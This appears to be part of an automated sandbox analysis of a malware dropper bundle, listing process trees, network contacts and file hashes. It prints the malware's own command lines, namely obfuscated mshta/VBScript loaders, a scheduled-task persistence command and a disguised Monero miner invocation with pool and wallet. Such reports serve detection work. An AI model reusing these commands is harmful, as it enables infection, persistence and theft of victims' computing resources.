PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 3368 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 3368 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 3368 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 3368 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 3368 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 3368 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3368 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3368 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3028 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
PID 3028 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
PID 3028 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
PID 3368 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 3368 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 3368 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 3368 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 3368 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 3368 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
PID 3368 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
PID 3368 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
PID 2672 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2672 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2672 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3368 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
PID 3368 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
PID 3980 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 3980 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 3980 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp
PID 2108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp
PID 2108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp
PID 3368 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Jonba.exe
PID 3368 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Jonba.exe
PID 3368 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Jonba.exe
PID 4544 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4544 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4544 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 1756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
PID 4284 wrote to memory of 1756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
PID 4284 wrote to memory of 1756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
PID 4284 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4284 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4284 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1756 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe C:\Windows\SysWOW64\mshta.exe
PID 1756 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe

"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe

"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"

C:\Users\Admin\AppData\Local\Temp\inst2.exe

"C:\Users\Admin\AppData\Local\Temp\inst2.exe"

C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg

C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg

C:\Users\Admin\AppData\Local\Temp\4.exe

"C:\Users\Admin\AppData\Local\Temp\4.exe"

C:\Users\Admin\AppData\Local\Temp\cxl-game.exe

"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp" /SL5="$40252,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"

C:\Users\Admin\AppData\Local\Temp\8.exe

"C:\Users\Admin\AppData\Local\Temp\8.exe"

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp" /SL5="$C0042,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\Jonba.exe

"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1992 -ip 1992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 1660

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe

..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -iM "search_hyperfs_206.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5048 -ip 5048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1016

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EcHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y ..\lXQ2g.WC

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe

"C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2944 -ip 2944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 780

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 my-all-group.bar udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.212.227:80 c.pki.goog tcp
NL 45.9.20.156:80 tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.independent.co.uk udp
US 104.26.3.46:443 iplogger.org tcp
US 151.101.1.91:443 www.independent.co.uk tcp
US 8.8.8.8:53 fobe1.com udp
US 8.8.8.8:53 91.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 rss.nytimes.com udp
US 151.101.1.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 164.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
GB 142.250.187.238:80 www.google-analytics.com tcp
US 8.8.8.8:53 s3.tebi.io udp
US 162.159.133.233:443 cdn.discordapp.com tcp
DE 195.201.169.32:443 s3.tebi.io tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 mas.to udp
US 104.21.11.154:443 mas.to tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 32.169.201.195.in-addr.arpa udp
US 8.8.8.8:53 154.11.21.104.in-addr.arpa udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 72.84.118.132:8080 tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
NL 45.9.20.156:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 163.172.171.111:14433 xmr-eu2.nanopool.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 111.171.172.163.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 54.37.137.114:14433 xmr-eu1.nanopool.org tcp
NL 45.9.20.156:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 114.137.37.54.in-addr.arpa udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.156:80 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.156:80 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

memory/3368-0-0x0000000074DBE000-0x0000000074DBF000-memory.dmp

memory/3368-1-0x00000000003A0000-0x0000000000AAC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe

MD5 a97c8c767343939c63ab2c3a7f9186fd
SHA1 5a8582d13af999922c1ad75db58950ad9523f8dc
SHA256 c528db4c190ac29c57c7810b26e9bf5c6e78b2ebbdbe64d81cfe57289a537768
SHA512 268bb93a76760e4f8a3d3229cdc5dec5930de46d1fdd85950015f68dab403f615d3e5854d04c72397c990cfd5525f233920c540adad50ef1e2696426ec37b599

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe

MD5 7b1ff60b0ba26d132c74535a641a0e02
SHA1 0180b514cb32ae43fcefda0863a96f1f79a51b33
SHA256 accb11ccb1692a5e771981a5659d68c8adc3e225f476ca3387b57d818381ed1b
SHA512 3dbe1669e6f0f2c498a4276ef4d31ccf872bc2fcd4f1a1c282e6caf48d6cbd12d8685a05a9f43e3eef9fff8ba143ad1b14227f6c1a4a4263e242b5f8716a1034

C:\Users\Admin\AppData\Local\Temp\inst2.exe

MD5 d57afeb2944b37345cda2e47db2ca5e3
SHA1 d3c8c74ae71450a59f005501d537bdb2bdd456ee
SHA256 06fa55c63ca655c7d67ac59fc8276d086bc39dbe727ef7de80fc42dcd575711e
SHA512 d9ece7d17c4e275f85a4bc58128ef67abc33b19cc77425e5fd2f896a03975469432fa9ec8f05eeefe3ac5062c1fb842702cc80a4eb97b1737597b6dc3dde94e8

C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg

MD5 9dabbd84d79a0330f7635748177a2d93
SHA1 73a4e520d772e4260651cb20b61ba4cb9a29635a
SHA256 a6e4be06d34448f4efa8655a3ae6e294c98ae4cb42f7c3da3be06b419fa8389d
SHA512 020114ba08ccb7ad7934e2046d2b61ebd1b006b8c31194f2cfb49ff4397f4db35dc67c8191552346d04709dee4871a13797cf284ef543e7280bc390a6746a314

C:\Users\Admin\AppData\Local\Temp\4.exe

MD5 1581dee9ad745f69413381da2c06f68b
SHA1 79926e1bbcb97f41e63efcba2ab696259fdb98ce
SHA256 f8cb7c4bf0b265fcbed502ab4abb3dfa6c0488c0d53c68742582df26bbd6bf0e
SHA512 9ea8f526304bf123e4f50cb94468d01287576edafcbc25046c9d5094d8990dee38a9309d00462239a8c73f6b3d288354dd6fcfab29ab4fe60db6acde500283ff

memory/2904-58-0x00007FFC0EC10000-0x00007FFC0F6D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cxl-game.exe

MD5 199ac38e98448f915974878daeac59d5
SHA1 ec36afe8b99d254b6983009930f70d51232be57e
SHA256 b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf
SHA512 61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 a7703240793e447ec11f535e808d2096
SHA1 913af985f540dab68be0cdf999f6d7cb52d5be96
SHA256 6a17ebf5da6aa3a1f4813e5f46fdd5d19d026bcfac91f232359f98e43df3c38f
SHA512 57bdcdfcfa11f6b5bf4149be0fee0444fcf67ccececf1009b166b17b7dce30da1a472f1890736186f4ef76e02ed23cc0dd2a41dc9bff94218a059832d4b5c69e

